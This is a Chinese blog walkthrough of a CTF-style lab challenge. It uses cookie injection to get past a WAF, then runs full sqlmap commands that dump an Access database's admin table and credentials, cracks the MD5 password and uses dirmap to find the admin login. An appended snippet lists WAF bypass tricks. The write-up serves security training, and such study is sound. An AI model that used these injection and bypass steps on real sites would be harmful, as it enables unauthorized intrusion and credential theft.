封神台--第二章:遇到阻难!绕过WAF过滤!解题思路

题目:

尤里在得到女神家网站密码后,却发现注入点权限很小,凭他的皮毛技术也没找到网站后台,
这时尤里通过旁站查询,他发现了女神家网站是用的主机空间托管,
他立刻扫描旁站,果然发现一个站点,且后台是默认路径……
尤里冷笑一声行动了起来,却发现有一层防火墙拦在了他的面前。。

一、查找sql注入点

进入测试页面http://59.63.200.79:8004/

1)字符型、数字型等盲注尝试

随意点开一篇文章,构造单引号',双引号"等闭合查询语句,发现提示如下

网站对请求地址进行了WAF防护,通过测试没有过滤 == order by、union ==

网页防护一般只拦截get、post传参,因此尝试cookie注入

2)cookie注入

cookie注入提交的参数以cookie方式提交,判断步骤 

1.找到http://59.63.200.79:8004/shownews.asp?id=171带参数的URL。

2.去掉“id=xx”查看页面显示是否正常,如果不正常,说明参数在数据传递中是直接起作用的。

3.清空浏览器地址栏,输入“javascript:alert(document.cookie="id="+escape("xx"));”,按Enter键后弹出一个对话框,内容是“id=xx”,然后用原来的URL刷新页面,如果显示正常,说明应用使用Request("id")这种方式获取数据的。

4.重复上面的步骤,将常规SQL注入中的判断语句带入上面的URL:“javascript:alert(document.cookie="id="+escape("xx and 1=1"));” “javascript:alert(document.cookie="id="+escape("xx and 1=2"));”。和常规SQL注入一样,如果分别返回正常和不正常页面,则说明该应用存在注入漏洞,并可以进行cookie注入。

 

二、使用sqlmap进行cookie注入

1)拆解表 

命令:sqlmap -u http://59.63.200.79:8004/shownews.asp\? --cookie "id=171" --tables   --level 2  --thread 10 --batch


[21:00:09] [WARNING] cannot retrieve table names, back-end DBMS is Microsoft Access
<current>
[8 tables]
+----------+
| user     |
| admin    |
| download |
| feedback |
| market   |
| news     |
| product  |
| vote     |
+----------+

2)拆解字段   

命令:sqlmap -u http://59.63.200.79:8004/shownews.asp\? --cookie "d=171" -T admin --column   --level 2  --thread 10 --batch

[21:23:22] [WARNING] cannot retrieve column names, back-end DBMS is Microsoft Access
Database: <current>
Table: admin
[7 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| user     | non-numeric |
| content  | non-numeric |
| flag     | non-numeric |
| id       | numeric     |
| password | non-numeric |
| title    | non-numeric |
| username | non-numeric |
+----------+-------------+

3)拆解字段值 

命令:sqlmap -u http://59.63.200.79:8004/shownews.asp\? --cookie "id=171" -T admin -C flag,user,password  --dump  --level 2  --thread 10 --batch


Table: admin
[1 entry]
+----+---------+-------------------------------------------------+--------+------------------+----------+------------------+
| id | flag    | title                                           | user   | content          | username | password         |
+----+---------+-------------------------------------------------+--------+------------------+----------+------------------+
| 1  | <blank> | \x8eV\xfdg:h\xb0N]\xe8Y4|sb\xc9QK??TX130N\xba | admin  | <P><FONT size=2> | admin    | b9a2a2b5dffb918c |
+----+---------+-------------------------------------------------+--------+------------------+----------+------------------+

4)密码解码

网站:https://www.cmd5.com/

使用密码b9a2a2b5dffb918c进行md5解码,得到密码为:welcome

三、后台扫描出登录地址

1)使用dirmap进行后台扫描

命令: python3 dirmap.py -i 59.63.200.79:8004 -lcf

(python源码,后台扫描器dirmap安装使用方法 :https://www.bilibili.com/read/cv6981656/


                     #####  # #####  #    #   ##   #####
                     #    # # #    # ##  ##  #  #  #    #
                     #    # # #    # # ## # #    # #    #
                     #    # # #####  #    # ###### #####
                     #    # # #   #  #    # #    # #
                     #####  # #    # #    # #    # #   v1.0

[*] Initialize targets...
[+] Load targets from: 59.63.200.79:8004
[+] Set the number of thread: 30
[+] Coroutine mode
[+] Current target: http://59.63.200.79:8004/
[*] Launching auto check 404
[+] Checking with: http://59.63.200.79:8004/rspecqjkmwmiribyeumjmlgmkvofngbouoxljtyrsg
[*] Use recursive scan: No
[*] Use dict mode
[+] Load dict:/Users/111/111/111/111/111/dirmap/data/dict_mode_dict.txt
[*] Use crawl mode
[200][text/html][5.37kb] http://59.63.200.79:8004/admin/login.asp

扫描发现登陆地址

2)最后登录获取flag提交

  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
绕过WAF使用sqlmapapi,有几种方法可以尝试。首先,可以利用MySQL的版本号注释功能绕过WAF,这是一种常见的绕过方法。此外,还可以使用一些其他技巧,比如使用0xA0代替空格、利用特殊用法如\N和.e浮绕过WAF,以及使用&&代替and等关键字和大括号注释来绕过WAF。这些方法可以绕过一些WAF对SQL注入过滤规则。 另外,还可以尝试利用HTTP协议的不同版本进行粘包来绕过某些WAF,因为一些WAF在解析数据包时可能会出现问题。通过发送不同版本协议的粘包,可以绕过WAF的检测。 此外,还可以利用URL编码、charset编码、MIME编码等进行绕过WAF。这些编码技巧可以混淆注入语句,使其绕过WAF过滤规则。 如果你想了解更多关于绕过WAF的方法,可以参考sqlmap的temper插件。该插件提供了更多关于数据库的绕过技巧,可以帮助你绕过WAF的防护机制。你可以在sqlmap的GitHub地址上找到这个插件。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [常见的WAF绕过方法](https://blog.csdn.net/wutianxu123/article/details/104260945)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值